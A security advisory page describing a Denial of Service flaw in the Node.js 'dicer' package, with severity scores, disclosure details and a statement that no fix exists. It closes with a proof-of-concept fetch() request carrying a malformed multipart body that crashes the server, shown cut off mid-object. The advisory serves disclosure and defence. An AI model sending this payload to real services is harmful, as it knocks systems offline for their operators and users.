Denial of Service (DoS) Affecting dicer package, versions *



    Attack Complexity Low
    Availability High

    Threat Intelligence

    Exploit Maturity Mature
    EPSS 0.11% (44th percentile)
Expand this section
7.5 high

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-DICER-2311764
  • published 19 May 2022
  • disclosed 7 Dec 2021
  • credit Aras Abbasi

How to fix?

There is no fixed version for dicer.


Affected versions of this package are vulnerable to Denial of Service (DoS). A malicious attacker can send a modified form to server, and crash the nodejs service. An attacker could sent the payload again and again so that the service continuously crashes.


    fetch('form-image', {
      method: 'POST',
      headers: {
        ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',
        ['content-length']: '145',
        host: '',
        connection: 'keep-alive',
      body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--'